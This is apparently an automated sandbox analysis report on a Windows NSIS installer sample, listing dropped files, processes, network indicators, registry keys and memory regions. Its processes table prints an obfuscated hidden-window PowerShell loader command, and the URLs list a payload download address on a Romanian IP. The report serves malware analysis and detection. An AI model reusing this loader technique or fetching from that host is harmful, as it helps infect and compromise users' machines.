Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Q20240425 MAX5073626.com.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Edderduns.Ama
|
DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration:
offset 0.000000, slope 4.716187
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Interrelatedness\Opsparingsformelen\jezebelian.san
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\neglectable.sin
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\cirkelen.txt
|
ASCII text, with very long lines (318), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\dugvaade.god
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojk5wowp.0uc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orrq3qcc.xgx.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
|
"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
||
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
193.239.86.203
|
|||
http://193.239.86.203/XWJPh99.bin
|
193.239.86.203
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://193.239.86.203/XWJPh99.binW
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://nsis.sf.net/NSIS_Error...
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 4 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
193.239.86.203
|
unknown
|
Romania
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Rmc-UI3GST
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-UI3GST
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-UI3GST
|
time
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\peruse\Uninstall\undervisningsvejledningerne\drengestreg
|
skramlende
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\aktionssprogs\sortebrdres
|
Cryptograph95
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
6DE1000
|
heap
|
page read and write
|
||
A319000
|
direct allocation
|
page execute and read and write
|
||
6DEF000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
7FD0000
|
heap
|
page read and write
|
||
6B0E000
|
stack
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
6839000
|
remote allocation
|
page execute and read and write
|
||
2A87000
|
heap
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
85A0000
|
heap
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
75FB000
|
stack
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
3E60000
|
remote allocation
|
page execute and read and write
|
||
6CA0000
|
direct allocation
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
6D25000
|
heap
|
page read and write
|
||
6FB0000
|
direct allocation
|
page read and write
|
||
7500000
|
trusted library allocation
|
page read and write
|
||
4620000
|
trusted library allocation
|
page execute and read and write
|
||
263E000
|
stack
|
page read and write
|
||
7590000
|
trusted library allocation
|
page read and write
|
||
2CD8000
|
heap
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
6B8F000
|
stack
|
page read and write
|
||
2259D000
|
stack
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
7570000
|
trusted library allocation
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
277D000
|
heap
|
page read and write
|
||
71F4000
|
heap
|
page read and write
|
||
225DD000
|
stack
|
page read and write
|
||
6F50000
|
direct allocation
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
7530000
|
trusted library allocation
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
2C5E000
|
heap
|
page read and write
|
||
298C000
|
stack
|
page read and write
|
||
6D20000
|
heap
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
2EA0000
|
heap
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
70C0000
|
heap
|
page read and write
|
||
8380000
|
heap
|
page read and write
|
||
8432000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
2DD8000
|
trusted library allocation
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
87C000
|
stack
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
833E000
|
stack
|
page read and write
|
||
6C80000
|
direct allocation
|
page read and write
|
||
427000
|
unkown
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2C14000
|
trusted library allocation
|
page read and write
|
||
6CC0000
|
direct allocation
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
6BE0000
|
direct allocation
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
6EFC000
|
stack
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
5E39000
|
remote allocation
|
page execute and read and write
|
||
6FA0000
|
direct allocation
|
page read and write
|
||
7180000
|
heap
|
page read and write
|
||
7520000
|
trusted library allocation
|
page read and write
|
||
707E000
|
stack
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
9B6000
|
heap
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
2C29000
|
trusted library allocation
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
2D1F000
|
heap
|
page read and write
|
||
285D000
|
stack
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
547000
|
heap
|
page read and write
|
||
2C13000
|
trusted library allocation
|
page execute and read and write
|
||
6C00000
|
direct allocation
|
page read and write
|
||
8100000
|
trusted library allocation
|
page read and write
|
||
5AF9000
|
trusted library allocation
|
page read and write
|
||
2D30000
|
trusted library allocation
|
page read and write
|
||
9919000
|
direct allocation
|
page execute and read and write
|
||
30A0000
|
heap
|
page read and write
|
||
6C60000
|
direct allocation
|
page read and write
|
||
46DE000
|
stack
|
page read and write
|
||
AD19000
|
direct allocation
|
page execute and read and write
|
||
7271000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4039000
|
remote allocation
|
page execute and read and write
|
||
2237D000
|
stack
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
6F60000
|
direct allocation
|
page read and write
|
||
6F40000
|
heap
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
6FE0000
|
direct allocation
|
page read and write
|
||
2D40000
|
trusted library allocation
|
page read and write
|
||
2B6F000
|
stack
|
page read and write
|
||
2772000
|
heap
|
page read and write
|
||
71D4000
|
heap
|
page read and write
|
||
7152000
|
heap
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
7192000
|
heap
|
page read and write
|
||
974000
|
heap
|
page read and write
|
||
7162000
|
heap
|
page read and write
|
||
2D42000
|
trusted library allocation
|
page read and write
|
||
29CF000
|
stack
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
2C38000
|
heap
|
page read and write
|
||
70BF000
|
stack
|
page read and write
|
||
2776000
|
heap
|
page read and write
|
||
2D79000
|
heap
|
page read and write
|
||
6C50000
|
direct allocation
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
82AC000
|
stack
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2D3A000
|
trusted library allocation
|
page execute and read and write
|
||
4630000
|
trusted library allocation
|
page read and write
|
||
451000
|
unkown
|
page readonly
|
||
7FC0000
|
trusted library allocation
|
page read and write
|
||
8120000
|
trusted library allocation
|
page read and write
|
||
576000
|
heap
|
page read and write
|
||
8BD000
|
stack
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
5C7C000
|
trusted library allocation
|
page read and write
|
||
83FC000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
6C90000
|
direct allocation
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
586000
|
heap
|
page read and write
|
||
223BB000
|
stack
|
page read and write
|
||
2D45000
|
trusted library allocation
|
page execute and read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
6DCD000
|
heap
|
page read and write
|
||
6C35000
|
heap
|
page execute and read and write
|
||
2261E000
|
stack
|
page read and write
|
||
42A000
|
unkown
|
page read and write
|
||
2C00000
|
trusted library allocation
|
page read and write
|
||
2265F000
|
stack
|
page read and write
|
||
75B0000
|
trusted library allocation
|
page read and write
|
||
2CA5000
|
heap
|
page read and write
|
||
6B4E000
|
stack
|
page read and write
|
||
226C0000
|
heap
|
page read and write
|
||
21B0000
|
heap
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
6F3F000
|
stack
|
page read and write
|
||
6F80000
|
direct allocation
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
8F19000
|
direct allocation
|
page execute and read and write
|
||
2130000
|
heap
|
page read and write
|
||
2DC0000
|
heap
|
page readonly
|
||
84E000
|
stack
|
page read and write
|
||
5B37000
|
trusted library allocation
|
page read and write
|
||
2DF7000
|
heap
|
page read and write
|
||
6CD0000
|
direct allocation
|
page read and write
|
||
5C63000
|
trusted library allocation
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page execute and read and write
|
||
6D88000
|
heap
|
page read and write
|
||
7540000
|
trusted library allocation
|
page read and write
|
||
B719000
|
direct allocation
|
page execute and read and write
|
||
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
5C76000
|
trusted library allocation
|
page read and write
|
||
2C10000
|
trusted library allocation
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
2D60000
|
trusted library allocation
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
8391000
|
heap
|
page read and write
|
||
5A3000
|
heap
|
page read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
6FD0000
|
direct allocation
|
page read and write
|
||
2247F000
|
stack
|
page read and write
|
||
2BF0000
|
trusted library section
|
page read and write
|
||
5439000
|
remote allocation
|
page execute and read and write
|
||
837C000
|
stack
|
page read and write
|
||
71F7000
|
heap
|
page read and write
|
||
4780000
|
heap
|
page read and write
|
||
6F90000
|
direct allocation
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
7360000
|
trusted library allocation
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
9E0000
|
trusted library section
|
page read and write
|
||
7000000
|
direct allocation
|
page read and write
|
||
985000
|
heap
|
page read and write
|
||
277A000
|
heap
|
page read and write
|
||
8400000
|
heap
|
page read and write
|
||
44E000
|
unkown
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
70AE000
|
stack
|
page read and write
|
||
7117000
|
trusted library allocation
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
4787000
|
heap
|
page read and write
|
||
7FA0000
|
trusted library allocation
|
page execute and read and write
|
||
6C30000
|
heap
|
page read and write
|
||
803D000
|
stack
|
page read and write
|
||
2C20000
|
trusted library allocation
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
80D5000
|
trusted library allocation
|
page read and write
|
||
4E0000
|
heap
|
page read and write
|
||
85B0000
|
trusted library allocation
|
page read and write
|
||
7580000
|
trusted library allocation
|
page read and write
|
||
423000
|
unkown
|
page read and write
|
||
2D4F000
|
unkown
|
page read and write
|
||
4A39000
|
remote allocation
|
page execute and read and write
|
||
6F70000
|
direct allocation
|
page read and write
|
||
2C1D000
|
trusted library allocation
|
page execute and read and write
|
||
42E000
|
unkown
|
page read and write
|
||
7510000
|
trusted library allocation
|
page read and write
|
||
4E5000
|
heap
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
82EC000
|
stack
|
page read and write
|
||
83B7000
|
heap
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
7124000
|
heap
|
page read and write
|
||
5A6000
|
heap
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
277C000
|
heap
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
2233E000
|
stack
|
page read and write
|
||
8580000
|
trusted library allocation
|
page execute and read and write
|
||
6FF0000
|
direct allocation
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
468E000
|
stack
|
page read and write
|
||
2771000
|
heap
|
page read and write
|
||
7F87000
|
stack
|
page read and write
|
||
7020000
|
heap
|
page read and write
|
||
273F000
|
stack
|
page read and write
|
||
451000
|
unkown
|
page readonly
|
||
434000
|
unkown
|
page read and write
|
||
475E000
|
stack
|
page read and write
|
||
2A4E000
|
stack
|
page read and write
|
||
8D40000
|
direct allocation
|
page execute and read and write
|
||
807E000
|
stack
|
page read and write
|
||
71A6000
|
heap
|
page read and write
|
||
80F000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6FC0000
|
direct allocation
|
page read and write
|
||
7F90000
|
heap
|
page read and write
|
||
8B8000
|
stack
|
page read and write
|
||
224CE000
|
stack
|
page read and write
|
||
471F000
|
stack
|
page read and write
|
||
226B0000
|
heap
|
page read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
25FF000
|
stack
|
page read and write
|
||
4C26000
|
trusted library allocation
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
2E4F000
|
stack
|
page read and write
|
||
6D80000
|
heap
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
8590000
|
trusted library allocation
|
page read and write
|
||
6DC2000
|
heap
|
page read and write
|
||
29FE000
|
unkown
|
page read and write
|
||
7200000
|
heap
|
page read and write
|
||
7120000
|
heap
|
page read and write
|
||
85D0000
|
direct allocation
|
page execute and read and write
|
||
5AD1000
|
trusted library allocation
|
page read and write
|
||
2C6A000
|
heap
|
page read and write
|
||
295D000
|
stack
|
page read and write
|
||
6C30000
|
heap
|
page execute and read and write
|
||
6D10000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
222FE000
|
stack
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
8090000
|
trusted library allocation
|
page execute and read and write
|
||
2250F000
|
stack
|
page read and write
|
||
7142000
|
heap
|
page read and write
|
||
7390000
|
trusted library allocation
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
2777000
|
heap
|
page read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
6C40000
|
direct allocation
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
218E000
|
stack
|
page read and write
|
||
6C10000
|
direct allocation
|
page read and write
|
||
83F4000
|
heap
|
page read and write
|
||
74DD000
|
stack
|
page read and write
|
||
7F520000
|
trusted library allocation
|
page execute and read and write
|
||
7230000
|
heap
|
page execute and read and write
|
||
6CB0000
|
direct allocation
|
page read and write
|
||
74F0000
|
trusted library allocation
|
page read and write
|
||
4640000
|
heap
|
page execute and read and write
|
||
7550000
|
trusted library allocation
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
4B32000
|
trusted library allocation
|
page read and write
|
||
6BF0000
|
direct allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
4C0000
|
heap
|
page read and write
|
||
6E80000
|
heap
|
page read and write
|
||
7157000
|
heap
|
page read and write
|
||
70EE000
|
stack
|
page read and write
|
||
8080000
|
heap
|
page read and write
|
||
58B000
|
heap
|
page read and write
|
||
58F000
|
heap
|
page read and write
|
||
8260000
|
trusted library allocation
|
page read and write
|
||
7FB0000
|
trusted library allocation
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page read and write
|
||
595000
|
heap
|
page read and write
|
||
6C70000
|
direct allocation
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
461C000
|
stack
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
7560000
|
trusted library allocation
|
page read and write
|
||
52E000
|
stack
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
2243E000
|
stack
|
page read and write
|
There are 319 hidden memdumps, click here to show them.